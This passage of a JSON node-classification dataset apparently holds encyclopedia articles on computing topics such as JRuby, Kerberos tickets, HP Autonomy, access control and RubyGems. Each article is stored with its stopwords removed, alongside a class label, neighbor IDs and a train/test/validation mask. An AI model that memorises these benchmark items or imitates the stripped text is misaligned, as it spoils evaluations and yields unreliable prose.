openjdk announced made available end august 2008 jruby team implemented dynamic invocation codebase dynamic invocation initially shipped 1.1.5 release primitive form version 1.7.0 enabled default java 8 builds table presents releases present significant steps jruby history aside versions mainly fixed bugs improved performance performance improvements also shown table every release usually brought improvements since early 2006 current jruby core team endeavored move jruby beyond simple c port support better performance aid eventual compilation java bytecode support end team set ambitious goal able run ruby rails unmodified using jruby process achieving goal jruby test suite expanded extent team gained confidence correctness jruby result toward end 2006 beginning 2007 began commit much complicated redesigns refactorings jruby core subsystems jruby designed work mixed-mode virtual machine ruby code either interpreted directly just-in-time compiled runtime java bytecode ahead-of-time compiled java bytecode execution october 2007 interpreted mode supported ruby constructs full aot/jit compiler available since version 1.1 compiler design allows interpreted compiled code run side-by-side well decompilation reoptimize outputting generated bytecode java class files jruby built-in support rails rspec rake rubygems embeds ffi subsystem allow use c libraries bundled gems also allows launching interactive ruby shell irb ruby mri netbeans ruby pack available netbeans 6 allows ide development ruby jruby well ruby rails two implementations ruby longer included netbeans 7.0 later jruby similar standard ruby interpreter except written java jruby features concepts including object-oriented programming dynamic-typing ruby key difference jruby tightly integrated java called directly java programs java significant footing development web applications one powerful feature jruby ability invoke classes java platform one must first load jruby java support calling require 'java following example creates java jframe jlabel jruby also allows user call java code using ruby-like underscore method naming refer javabean properties attributes jruby easily called java using either jsr 223 scripting java 6 apache bean scripting framework according benchmarks jruby faster alternatives since implementations vary much code loaded execution different methods measuring speed lead biased interpretations performance advantages time takes java virtual machine load often excluded execution times calculating benchmarks jruby significant architectural advantage able leverage jvm threads without constrained global interpreter lock similarly rubinius therefore achieving full parallelism within process ruby mri achieve despite leveraging os threads real mongrel web server application tested 2007 jruby performance better ruby mri 1.8 java virtual machine instantiated 2007 benchmark ruby implementations jruby faster ruby mri 1.8 tests yarv outperformed april 2014 computer language benchmarks game jruby 1.7.4 typically performance ruby mri 2.1.0 uses memory",
    "neighbors": [
      3712,
      4358,
      7430,
      7176,
      9229,
      910,
      2191,
      7695,
      10771,
      11670,
      9245,
      10526,
      8609,
      5031,
      5677,
      7983,
      6067,
      564,
      4277,
      9011,
      5048,
      5945,
      6074,
      10683,
      1852,
      572,
      7485,
      3519,
      7487,
      9665,
      6338,
      10684,
      7750,
      11208,
      5578,
      6860,
      3920,
      10193,
      1363,
      220,
      10973,
      4960,
      225,
      1250,
      1379,
      2658,
      5987,
      3560,
      3561,
      3562,
      7146,
      5612,
      11625,
      9455,
      5872,
      8825,
      7026,
      9714,
      2804,
      10228,
      5238,
      9078,
      3705,
      2045,
      3966,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 5568,
    "label": 4,
    "text": "Ticket_Granting_Ticket:ticket granting ticket computer security systems ticket granting ticket ticket get tickets tgt small encrypted identification file limited validity period authentication file granted user data traffic protection key distribution center kdc subsystem authentication services kerberos tgt file contains session key expiration date user ip address protects user man-in-the-middle attacks tgt used obtain service ticket ticket granting service tgs user granted access network services service ticket provided",
    "neighbors": [
      7,
      4242,
      3477,
      2080,
      2083,
      9635,
      2087,
      3629,
      4663,
      8760,
      5433,
      10058,
      6098,
      8670,
      6750,
      2143,
      2274,
      6888,
      1012,
      2558,
      4863
    ],
    "mask": "None"
  },
  {
    "node_id": 5569,
    "label": 9,
    "text": "Le_Lisp:le lisp le lisp also le_lisp le-lisp programming language dialect language lisp developed french institute research computer science automation inria implementation language large scale integration vlsi workstation designed direction jean vuillemin le lisp also run various incompatible platforms mostly running unix operating systems used project main goals language powerful post-maclisp version lisp would portable compatible extensible efficient jérôme chailloux led le lisp team working emmanuel st. james matthieu devin jean-marie hullot 1980 dialect historically noteworthy one first lisp implementations available apple ii ibm pc",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      576,
      7234,
      8258,
      8771,
      3142,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      7269,
      8293,
      2666,
      5751,
      7805,
      9345,
      1159,
      9865,
      6797,
      9877,
      5803,
      2225,
      6840,
      6329,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      1301,
      791,
      1304,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      823,
      311,
      4409,
      6969,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      5492,
      3446,
      1399,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      3051,
      5611,
      499,
      7670,
      11255,
      8700,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5570,
    "label": 9,
    "text": "PROSE_modeling_language:prose modeling language prose mathematical 4gl virtual machine established holistic modeling paradigm known synthetic calculus aka metacalculus successor slang/cue simulation optimization language developed trw systems introduced 1974 control data supercomputers first commercial language employ automatic differentiation ad optimized loop instruction-stack cdc 6600 cpu although prose rich block-structured procedural language focus blending simultaneous-variable mathematical systems kinds system models distinct operator templates automate solve added procedural syntax automated system problems considered holistic unknowns simultaneous could reduced formulation solve piecewise algebra manipulation e.g substitution solved wholes wholeness also pertained algorithmic determinacy mathematical closure made solution convergence possible certain principle corrupted numerical instability since holistic problem models could independently automated solved due closure could blended higher wholes nesting one inside another manner subroutines users could regard ordinary subroutines yet semantically mathematical blending considerably complex mechanics subroutines iterative solution engine attached problem model calling operator template program hierarchy numerical solution process engine would take control would call problem model subroutine iteratively returning calling template system problem solved maybe iterative model-subroutine calls engine would invoke automatic differentiation formulas model holarchy respect model input-unknowns arguments defined calling template additional mechanisms performed semantics accommodate ubiquitous nesting holistic models nested solution prediction e.g numerical integration solution algorithm addition model formulas would also automatically differentiated since differentiation propagated via chain rule throughout integration initial conditions boundary conditions differentiation boundary conditions respect initial conditions called fréchet derivatives would performed enabled routine solution boundary-value problems iterative shooting methods using newton-method engines course time propagated differentiation could also performed respect arbitrary parameters differential equations shape integrated functions parameters could solved unknowns nest holarchy integration process significant convenience overall problem formulation inner nested problem search outer problem also search e.g optimization partial derivatives produced respect inner-search unknowns converted partial derivatives outer search via differential-geometry coordinate transformation also iterative process involving higher order differentiation sometimes different independent variables yet extended iterative differential-arithmetic processes totally hidden user hardly significant modeling task ordinary subroutines calls involved fact iterative number kind iterations indefinite whole sub-problem solved also part higher problem natural call problem nest holon dynamic entity perfectly fitted theory arthur koestler coined term done original prose documentation years koestler theory new somewhat controversial term later used ken wilber ratified koestler holon concepts complete modeling paradigm consisted three classes holons distinguished operator templates three operator templates created dynamic holons encapsulating equations model subroutine hierarchy could contain nested holons model subroutines could contain operator templates encapsulating sub-problems holon holarchy solver algorithm engine could interchanged others holon class extended arithmetic automatic differentiation ability dynamically differentiate numerical integration gave rise unique mode holarchy modeling illustrated figure 1 example problem originally fortran application rand report algorithm used optimization boundary-value problem applications report also published textbook described quasilinearization alternative dynamic programming invented author richard bellman fortran program appendix two textbook contains five times amount code 25-line prose program entirely embedded white boxes visible syntax figure 1 significant modeling versus programming discussion fortran program contains 14 loops whereas prose program contains loops another point make program simplification dynamic memory management could taken granted user return holon calling operator template holon destroyed memory freed use application actually trivial amount code required state problem prose program small iterative solution methodology hood solver engines ellipses figure 1 models seldom need loops spreadsheets modeling tools n't even example problem provides full encapsulation holon paradigm single application three holon types employed optimization searching highest level holarchy correlation searching restricted subset optimization searching middle holon system dynamics simulation innermost holon another prose program anatomy illustrated figure 2 somewhat larger application optimization cantilevered wing structure maximize lift subject structure weight constraints case ten coordinate dimensions optimization unknowns searched outer holon solver two outer holons hidden coordinate system unknowns search engine solves engines require partial derivatives downstream variables dependent upon unknowns evaluated automatic differentiation arithmetic derivatives outer coordinate system must computed derivatives inner coordinate system inner search engine converged found local solution differential-geometry coordinate transformation applied wing problem figure 2 downstream subprograms shown including integral quadrature function subprograms include numerical integration system dynamics differential equations model automatic differentiation arithmetic includes differentiation integration algorithm simulation engine quadrature solver evaluate derivatives boundary end-point integrated curves conditions respect initial conditions calculation possible via formal symbolic differentiation feasible finite difference approximation automatic differentiation exact chain-rule propagation feasible figure 3 shows generalized architecture holon profile showing visible modeling syntax invisible semantics architecture characteristic 5-step iteration process holon calculus problem-solving unit mathematically associated coordinate system dynamically created operation template operator solver engine either numerical predictor case simulation search engine case correlation optimization operand model procedure may holarchy subordinated holons essence holon metaphoric computation container like spreadsheet allowing procedural looping like ordinary algebraic language yet purpose frame algebraic formulas represent higher mathematics e.g differential equations algebraic formulas variables rates figures 4-7 show different holon classes simulation correlation optimization reflect architecture separating modeling science equations algorithmic solver engines art numerical approximation mathematics mentioned holon computation container like spreadsheet encapsulates set input algebraic formulas unlike spreadsheet formulas parts irreducible whole solved together unit involving succession approximations iterations spreadsheet involves single pass formula calculations may therefore thought degenerate reduced holon one involves single-pass calculations holon model elevates encapsulated system algebraic formulas higher problem archetype relating simultaneous unknowns definable solution condition single pass set formulas iterative calculus hood required converge multiple-pass approximations solution condition holon automates one three system-problem archetypes emerged higher math distinct class solution methods applicable interchangeable operators methods operate input formulas calculations guide successive approximations holon solution problem archetypes easily precipitate formula collections represent modeling natural phenomena used building blocks synthesize whole computation programs holarchies sequential nested holons used together alphabet archetypal problems become topology higher math modeling within algebraic programming language containing special semantic glue methodologies propagate calculus influence collections holons holons combine form greater wholes via alphabetic combination holarchies also tend become problem archetypes often precipitate natural phenomena modeling examples boundary-value problems solved combination correlation simulation holons prose introduced pantheon interchangeable solvers named mythical gods three engine categories solvers applied different numerical methods three engine categories depending upon nesting context applied simulation solvers janus mercury minerva merlin pegasus could nested automatic differentiation contexts correlation optimization overloaded automatic-differentiation arithmetic thus hybrid versions janisis isis janus gemini merlin neptune introduced would work efficiently automatic differentiation mode ordinary arithmetic mode differentiation internally turned greatly speeded iterative searches solvers like ajax mars jove zeus jupiter iteratively called models many times non-differentation mode various modes non-derivative search sub-steps applied",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 5571,
    "label": 7,
    "text": "HP_Autonomy:hp autonomy hp autonomy previously autonomy corporation plc multinational enterprise software company founded cambridge united kingdom 1996 originally autonomy specialised analysis large scale unstructured big data becoming uk largest successful software business 2010 used combination technologies born research university cambridge developed variety enterprise search knowledge management applications using adaptive pattern recognition techniques centered bayesian inference conjunction traditional methods maintained aggressively entrepreneurial marketing approach controls described rod iron said include zero tolerance firing weakest 5 sales force quarter cosseting best sales staff like rock stars autonomy acquired hewlett-packard hp october 2011 deal valued autonomy 11.7 billion £7.4 billion premium around 79 market price widely criticized absurdly high botched strategy shift chaotic attempt rapidly reposition hp enhance earnings expanding high-margin software services sector within year major culture clashes became apparent hp written 8.8 billion autonomy value hp claims resulted accounting improprieties misrepresentations disclosure failures previous management successful fraud case brought cfo sushovan hussain previous management turn accused hp textbook example defensive stalling conceal evidence prior knowledge gross mismanagement undermining company noting public awareness since 2009 financial reporting issues even hp cfo disagreed price paid external observers generally state small part write-off appears due accounting mis-statements hp overpaid businesses previously hp recruited robert youngjohns ex-microsoft president north america take hp autonomy september 2012 worked towards turnaround expanding information management analytics software business though company integrating hp software autonomy remains singular operational business 2017 hp sold autonomy assets part wider deal british software company micro focus autonomy founded cambridge england michael lynch david tabizel richard gaunt 1996 spin-off cambridge neurodynamics firm specializing computer-based finger print recognition autonomy floated 1998 nasdaq exchange share price approximately £0.30 height dot-com bubble peak share price £30 december 2005 autonomy acquired verity inc. one main competitors approximately us 500 million 2005 autonomy also acquired neurodynamics may 2007 exercising option buy stake technology start blinkx inc combining consumer division autonomy floated blinkx valuation 250 million july 2007 autonomy acquired zantaz email archiving litigation support company 375 million october 2007 autonomy acquired meridio holdings ltd uk company based northern ireland specialised records management software £20 million 28 may 2008 kainos extended partnership autonomy high-end information processing information risk management irm deliver information governance solutions customer base january 2009 autonomy acquired interwoven niche provider enterprise content management software 775 million interwoven became autonomy interwoven autonomy imanage 2009 paul morland leading analyst started raising concerns autonomy exaggerated performance claims june 2010 autonomy announced acquire information governance business ca technologies terms sale disclosed 5 may 2011 mercedes formula one team announced 8 million sponsorship deal autonomy 8 july 2010 tottenham hotspur fc announced two-year sponsorship deal autonomy premier league kit 2011–12 season spurs premier league shirt featured autonomy augmented reality technology aurasma 16 may 2011 autonomy acquired iron mountain digital pioneer e-discovery online backup solutions provider 380 million iron mountain incorporated 18 august 2011 hewlett-packard announced would purchase autonomy us 42.11 per share transaction unanimously approved boards directors hp autonomy autonomy board recommended shareholders accept offer 3 october 2011 hp closed deal announcing acquired around 87.3 shares around 10.2 billion valuing company around 11.7 billion total may 2012 mike lynch left role autonomy ceo significant drop revenue previous quarter september 2012 robert youngjohns appointed svp gm autonomy/information management business unit november 2012 hewlett-packard announced taking 8.8 billion accounting charge claiming serious accounting improprieties outright misrepresentations autonomy share price fell decades low news however mike lynch counter-alleged problems due hp running autonomy citing internecine warfare within organization serious fraud office united kingdom u.s. securities exchange commission joined fbi investigating potential anomalies however january 2015 sfo closed investigation chance successful prosecution low three lawsuits brought shareholders hp fall value hp shares august 2014 united states district court judge threw proposed settlement autonomy previous management argued would collusive intended divert scrutiny hp executives responsibility knowledge fee 48 million april 2018 autonomy ex-cfo sushovan hussain charged us found guilty accounting fraud evidence lynch charged fraud november 30 january 2014 company announced one partners kainos integrated hp idol 10.5 new version hp autonomy ’ information analytics engine kainos electronic medical record platform evolve 31 october 2015 autonomy software products divided hp inc hpq hewlett packard enterprise hpe result hewlett-packard co separation hp inc assigned ownership largely consisting autonomy content management software components including teamsite qfiniti qfiniti managed services mediabin optimost explore hewlett packard enterprise retains ownership remaining software 2 may 2016 opentext acquires hp teamsite hp mediabin hp qfiniti hp explore hp aurasma hp optimost hp inc 170 million 1 september 2017 merged micro focus hp autonomy products include intelligent data operating layer idol allows search processing text taken structured data unstructured human information—including e-mail mobile data—whether originates database audio video text files streams processing information idol referred autonomy meaning-based computing hp autonomy offerings include api platform building data rich applications ease use quick deploy enterprise search solution built onto ondemand api platform june 2013 hp announced platform analyzing finding meaning big data petabytes structured unstructured information also aims identify information needed placed low cost storage even dumped components platform include january 2014 hp released new version hp idol strengthens integration several key components platform expanding upon idol ’ analytics reliability ease use cmswire reported new release lot hood catapult idol firmly center big data fray autonomy business primary offices cambridge sunnyvale california well major offices uk us canada france japan australia singapore germany smaller offices india throughout europe latin america",
    "neighbors": [
      4864,
      8229,
      1638,
      9031,
      5384,
      11100,
      11465,
      6765,
      3214,
      2258,
      1304,
      8216,
      5756
    ],
    "mask": "Test"
  },
  {
    "node_id": 5572,
    "label": 5,
    "text": "Reverse_telnet:reverse telnet reverse telnet specialized application telnet server side connection reads writes data computer terminal line rs-232 serial port rather providing command shell host device typically reverse telnet implemented embedded device e.g terminal/console server ethernet network interface serial port use reverse telnet device ip-networked users use telnet access serially-connected devices past reverse telnet typically used connect modems external asynchronous devices today reverse telnet used mostly connecting console port router switch device client command line initiating reverse telnet connection might look like telnet 172.16.1.254 2002 example 172.16.1.254 ip address console device 2002 tcp port associated terminal line server",
    "neighbors": [
      11112,
      1121,
      5492,
      7188
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5573,
    "label": 4,
    "text": "Attribute-based_access_control:attribute-based access control attribute-based access control abac also known policy-based access control defines access control paradigm whereby access rights granted users use policies combine attributes together policies use type attributes user attributes resource attributes object environment attributes etc. model supports boolean logic rules contain statements making request resource action example requestor manager allow read/write access sensitive data unlike role-based access control rbac employs pre-defined roles carry specific set privileges associated subjects assigned key difference abac concept policies express complex boolean rule set evaluate many different attributes attribute values set-valued atomic-valued set-valued attributes contain one atomic value examples role project atomic-valued attributes contain one atomic value examples clearance sensitivity attributes compared static values one another thus enabling relation-based access control although concept existed many years abac considered next generation authorization model provides dynamic context-aware risk-intelligent access control resources allowing access control policies include specific attributes many different information systems defined resolve authorization achieve efficient regulatory compliance allowing enterprises flexibility implementations based existing infrastructures attribute-based access control sometimes referred policy-based access control pbac claims-based access control cbac microsoft-specific term key standards implement abac xacml alfa xacml abac seen abac comes recommended architecture follows attributes anything anyone tend fall 4 different categories functions grammatical function policies statements bring together attributes express happen allowed policies abac granting denying policies policies also local global written way override policies examples include abac many policies like cater many different scenarios technologies historically access control models included mandatory access control mac discretionary access control dac recently role-based access control rbac access control models user-centric take account additional parameters resource information relationship user requesting entity resource dynamic information e.g time day user ip abac tries address defining access control based attributes describe requesting entity user targeted object resource desired action view edit delete ... environmental contextual information access control said attribute-based one standard implements attribute- policy-based access control xacml extensible access control markup language xacml defines architecture policy language request response scheme handle attribute management user attribute assignment object attribute assignment environment attribute assignment left traditional iam tools databases directories companies including every branch united states military started using abac basic level abac uses ‘ if/then/and ’ model protect data rather assigning data user take information anywhere please give hacker ability swipe file us department commerce made mandatory practice adoption spreading throughout several governmental military agencies concept abac applied level technology stack enterprise infrastructure example abac used firewall server application database data layer use attributes bring additional context evaluate legitimacy request access inform decision grant deny access important consideration evaluating abac solutions understand potential overhead performance impact user experience expected granular controls higher overhead abac used apply attribute-based fine-grained authorization api methods functions instance banking api may expose approvetransaction transid method abac used secure call abac policy author write following flow would follows one key benefits abac authorization policies attributes defined technology neutral way means policies defined apis databases reused application space common applications benefit abac process flow one described api section applies security databases long specific database vendors oracle vpd ibm fgac microsoft rls means achieve fine-grained abac-like security using abac possible define policies apply across multiple databases called dynamic data masking example would data security typically goes one step database security applies control directly data element often referred data-centric security traditional relational databases abac policies control access data table column field cell sub-cell using logical controls filtering conditions masking based attributes attributes data user session tools based deliver greatest level flexibility dynamically granting/denying access specific data element big data distributed file systems hadoop abac applied data layer control access folder sub-folder file sub-file granular attribute-based access control also applied big data systems like hadoop policies similar used previously applied retrieving data data lakes windows server 2012 microsoft implemented abac approach controlling access files folders achieved dynamic access control lists dacl security descriptor definition language sddl sddl seen abac language uses metadata user claims file folder control access gartner improving-runtime-authorization-maturity",
    "neighbors": [
      1792,
      8838,
      3213,
      8210,
      10389,
      1961,
      4912,
      2737,
      10933,
      3262,
      3521,
      210,
      10580,
      5077,
      7260,
      2013,
      6750,
      9958,
      6381,
      5624,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 5574,
    "label": 4,
    "text": "Dorothy_Blum:dorothy blum dorothy toplitzky blum february 21 1924 – october 1980 american computer scientist cryptanalyst worked national security agency predecessors 1944 death 1980 dorothy toplitzky born 1924 new york city austro-hungarian immigrant parents graduating brooklyn college 1944 joined cryptologic unit u.s. army remained organization world war ii became united states army security agency later national security agency nsa married nsa mathematician joseph blum 1950 later son 1950s blum worked nsa internal organization tasked keep ing abreast latest advances field computing recommended computer technologies could adapted cryptanalysis communications intelligence wrote computer software nsa spearheaded effort teach nsa employees write cryptanalytic programs began using fortran programming language three years public release 1957 throughout 1960s 1970s blum continued work field computer science helping design nsa computer systems automate processes 1972 became chief nsa computer operations organization c7 woman time organization management hierarchy appointed chief plans project development organization t4 telecommunications computer services organization 1977 also involved women nsa win group blum died cancer october 1980 aged 56 internal award nsa named 2004 inducted nsa hall honor official nsa biography states 36-year career blum significantly changed way nsa cryptanalysis also elected one top 100 outstanding women federal government",
    "neighbors": [
      3960,
      1941,
      7887
    ],
    "mask": "Test"
  },
  {
    "node_id": 5575,
    "label": 4,
    "text": "Security_BSides:security bsides security bsides commonly referred bsides series loosely affiliated information security conferences co-founded mike dahn jack daniel chris nickerson 2009 due overwhelming number presentation submissions black hat usa 2009 rejected presentations presented smaller group individuals time conference format matured released enable individuals start bsides conferences three event styles structured unconference hybrid structured event follows traditional conference model often times happens tandem larger conferences black hat rsa etc attendees typically intermingle attend one events talks submitted local event ahead time selected scheduled prior start conference unconference event style completely attendee driven attendees appear predetermined time discuss ideas collaboratively agree upon schedule look like day talks get attention conversation get added schedule",
    "neighbors": [
      7449,
      2275,
      7899,
      11455
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5576,
    "label": 5,
    "text": "H.248:h.248 gateway control protocol megaco h.248 implementation media gateway control protocol architecture providing telecommunication services across converged internetwork consisting traditional public switched telephone network pstn modern packet networks internet h.248 designation recommendations developed itu telecommunication standardization sector itu-t megaco contraction media gateway control protocol used earliest specifications internet engineering task force ietf standard published march 2013 itu-t entitled h.248.1 gateway control protocol version 3 megaco/h.248 follows guidelines published rfc 2805 april 2000 entitled media gateway control protocol architecture requirements protocol performs functions media gateway control protocol mgcp however formal standard mgcp informational status using different syntax symbolic representation two protocols directly interoperable complementary h.323 session initiation protocol sip protocols h.248 result collaboration megaco working group internet engineering task force ietf international telecommunication union telecommunication study group 16 ietf originally published standard rfc 3015 superseded rfc 3525 term megaco ietf designation megaco combines concepts mgcp media device control protocol mdcp mgcp originated combination simple gateway control protocol sgcp internet protocol device control ipdc itu took responsibility protocol maintenance ietf reclassified publications historic rfc 5125 itu published three versions h.248 recent september 2005 h.248 encompasses base protocol specification h.248.1 many extensions defined throughout h.248 sub-series h.248/megaco due master-slave nature describe establishment calls across domains across media gateway controllers h.248/megaco used communication downward media gateways constitute complete system architecture requires protocols communication multiple mgcs device handles call control function referred intelligent media gateway controller device handles media referred relatively unintelligent media gateway h.248 defines protocol media gateway controllers control media gateways support multimedia streams across ip networks public switched telephone network pstn typically used providing voice internet protocol voip services like voice fax ip networks pstn entirely within ip networks types devices targeted control h.248/megaco low level control structure h.248 generally viewed complementary h.323 session initiation protocol sip media gateway controller mgc uses h.248/megaco manage media establishment control number media gateways mgs voip protocols sip h.323 used one communication controllers sip perspective combination mgc mgs treated together sip gateway h.248/megaco model describes connection model contains logical entities objects within media gateways mgs controlled media gateway controller main entities contexts terminations ip multimedia subsystem ims media gateway control function mgcf control media gateways mgw send receive call pstn circuit switched cs networks using h.248 mgcf uses sip messages interact call session control function cscf breakout gateway control function bgcf although modeling media gateway differs h.248/megaco compared mgcp similarity semantics commands two specifications almost one-to-one mapping commands megaco mgcp example create connection command mgcp equivalent add termination command megaco modify connection command mgcp equates modify termination command megaco delete connection command equates subtract termination command megaco h.248/megaco model complex media gateway control protocol mgcp model provides flexibility defining media control example mgcp call use endpoint mode conference manage stream mixing achieve fine grain control h.248/megaco managing media streams h.248/megaco model simplifies connection setup within mg entities outside mg simplifies mechanism media gateway controller mgc specify associated media streams well specify direction media flow h.248/megaco therefore able provide greater application level support mgcp example setting multi-party conference h.248 merely involves adding several terminations context case mgcp however mgc needs establish several connections special type endpoint called conference bridge following main differences megaco/h.248 mgcp",
    "neighbors": [
      7681,
      7407,
      2802,
      5843,
      8437,
      3580,
      10271
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5577,
    "label": 7,
    "text": "Sqrrl:sqrrl sqrrl data inc. american company founded 2012 markets software big data analytics cyber security company roots united states intelligence community national security agency sqrrl involved creation actively contributes apache accumulo related apache projects sqrrl ’ primary product threat hunting platform designed active detection advanced persistent threats january 2018 sqrrl acquired amazon sqrrl ’ founders previously worked national security agency ceo co-founder oren falkowitz formerly cybercommand co-founder ely kahn former director us cybersecurity policy sqrrl platform relies open-source apache accumulo technology accumulo began development 2008 went open source 2011 sqrrl founded summer 2012 use accumulo cybersecurity sqrrl founded washington d.c. quickly moved cambridge massachusetts august 2012 sqrrl announced 2 million seed round led accomplice formerly atlas venture matrix partners october 2013 sqrrl received 5.2 million funding led accomplice matrix partners february 2015 sqrrl raised another 7.1 million funding linked data analysis toolkit january 24 2018 reported sqrrl acquired amazon would become part amazon web services sqrrl ’ main product visual cyber threat hunting platform combines technology link analysis user behavior analytics user entity asset event data combined behavior graph users navigate respond security incidents well search undetected threats sqrrl integrates security information event management siem systems ibm qradar platform also integrates machine learning risk-scoring sqrrl mentioned cyber security industry marketing sc mag ’ top innovator award 2015 2016 2017 cybersecurity excellence award new threat hunting category",
    "neighbors": [
      7816,
      3433,
      10539,
      7887,
      7248,
      11343,
      7124,
      53,
      8921,
      3323,
      9631
    ],
    "mask": "Test"
  },
  {
    "node_id": 5578,
    "label": 2,
    "text": "RubyGems:rubygems rubygems package manager ruby programming language provides standard format distributing ruby programs libraries self-contained format called gem tool designed easily manage installation gems server distributing created chad fowler jim weirich david alan black paul brannan richard kilmer rubyconf 2004 interface rubygems command-line tool called gem install manage libraries gems rubygems integrates ruby run-time loader help find load installed gems standardized library folders though possible use private rubygems repository public repository commonly used gem management public repository helps users find gems resolve dependencies install rubygems bundled standard ruby package ruby 1.9 development rubygems started november 2003 released public march 14 2004 pi day 2004 2010 default public repository gems moved http //gems.rubyforge.org http //rubygems.org still use also rubygems development moved github 2010 though rubygems existed since ruby 1.8 part standard ruby distribution ruby 1.9 previously compatibility rubygems ruby varied many versions rubygems almost fully incompatible many versions ruby versions key features unusable example ruby 1.9 came rubygems 1.3.7 standard distribution rubygems 1.4.x compatible ruby 1.9 meant updating rubygems ruby 1.9 possible rubygems 1.5.0 released 2011 two years first stable release ruby 1.9 compatibility issues led rapid development rubygems switching 4–6 week release schedule reflected 38 releases 2004 2010 117 releases 2011 2016 45 versions released 2013 highest number releases year rubygems every gem contains name version platform gems work ruby designed particular platform based cpu architecture operating-system type version gem consists code organization follows following structure gem called gem_name gems packages similar ebuilds contain package information along files install gems usually built .gemspec files yaml files containing information gems however ruby code may also build gems directly practice usually used rake codice_1 command used build upload download install gem packages rubygems similar apt-get portage yum npm functionality installation uninstallation listing installed gems listing available gems e.g create rdoc documentation gems adding trusted certificate download install gem search available gems e.g gem command may also used build maintain codice_5 codice_6 files build codice_6 codice_5 file since ruby gems run code application may lead various security issues due installation malicious gems creator malicious gems may able compromise user system server number methods developed counter security threat",
    "neighbors": [
      8068,
      7430,
      8966,
      9229,
      2191,
      7695,
      9487,
      10771,
      788,
      1813,
      8213,
      10900,
      8476,
      9245,
      8354,
      5155,
      4775,
      4777,
      6828,
      7341,
      7983,
      304,
      3120,
      564,
      4277,
      2105,
      5945,
      5819,
      1852,
      190,
      5567,
      6338,
      9671,
      11208,
      5067,
      9932,
      3918,
      463,
      5070,
      3667,
      11221,
      6361,
      2010,
      10973,
      2401,
      1379,
      741,
      231,
      6119,
      2281,
      9063,
      11625,
      5612,
      2804,
      7293
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5579,
    "label": 4,
    "text": "Nick_Levay:nick levay nick levay also known rattle american computer security expert hacker president ngo-isac former chief security officer council foreign relations carbon black computer security company boston area 2008 2013 director technical operations information security center american progress public policy research organization rattle subject pioneering profile hacker culture published nashville tennessee 1999 2001 tom cross co-founded industrial memetics built memestreams web log early social networking web site rattle presented phreaknic annual hacker technology convention held nashville 2005 2011 2011 talk counter espionage strategy tactics",
    "neighbors": [
      2976,
      4956,
      2558,
      8575
    ],
    "mask": "Test"
  },
  {
    "node_id": 5580,
    "label": 6,
    "text": "Global_Storage_Architecture:global storage architecture gsa global storage architecture distributed file system created ibm replace andrew file system dce distributed file system",
    "neighbors": [
      3826,
      3323,
      3898
    ],
    "mask": "Test"
  },
  {
    "node_id": 5581,
    "label": 5,
    "text": "Token_passing:token passing local area network token passing channel access method signal called token passed nodes authorize node communicate contrast polling access methods pre-defined master node well-known examples token ring arcnet range others including fddi fiber distributed data interface popular early mid 1990s token passing schemes degrade deterministically load key reason popular industrial control lans map manufacturing automation protocol advantage contention based channel access csma/cd early ethernet collisions eliminated channel bandwidth fully utilized without idle time demand heavy disadvantage even demand light station wishing transmit must wait token increasing latency types token passing schemes need explicitly send token systems process passing token implicit example channel access method used contention free time slots itu-t g.hn standard high-speed local area networking using existing home wires power lines phone lines coaxial cable",
    "neighbors": [
      6857,
      7498,
      4691,
      2911,
      4543
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5582,
    "label": 9,
    "text": "QUIKSCRIPT:quikscript quikscript simulation language derived simscript based 20-gate",
    "neighbors": [
      5584,
      8262,
      5775
    ],
    "mask": "Train"
  },
  {
    "node_id": 5583,
    "label": 1,
    "text": "Orbada:orbada orbada free tool database developers sql developers administrators software includes many wizards special features help database administrator job using java jdbc drivers allows users connect multiple databases orbada provided dedicated plug-in databases oracle sqlite firebird hsqldb derbydb help syntax highlighting database browser profiler tool still developed additional plug-ins program distributed gnu general public license",
    "neighbors": [
      10340,
      5546,
      5612,
      9389,
      7983,
      2901,
      9177,
      9471
    ],
    "mask": "Test"
  },
  {
    "node_id": 5584,
    "label": 9,
    "text": "SIMSCRIPT:simscript simscript free-form english-like general-purpose simulation language conceived harry markowitz bernard hausner rand corporation 1962 implemented fortran preprocessor ibm 7090 designed large discrete event simulations influenced simula though earlier versions released public domain simscript commercialized markowitz company california analysis center inc. caci produced proprietary versions simscript i.5 simscript ii.5 simscript ii.5 last pre-pc incarnation simscript one oldest computer simulation languages although military contractor caci released 1971 still enjoys wide use large-scale military air-traffic control simulations simscript iii release 4.0 available 2009 ran windows 7 sun os linux object-oriented features 1997 simscript iii already gui interface compiler latest version release 5 earlier versions already supported 64-bit processing pl/i implementation developed 1968-1969 based public domain version released rand corporation",
    "neighbors": [
      8262,
      5896,
      10568,
      5582,
      5775,
      7186,
      8502,
      823,
      3960,
      10458
    ],
    "mask": "None"
  },
  {
    "node_id": 5585,
    "label": 9,
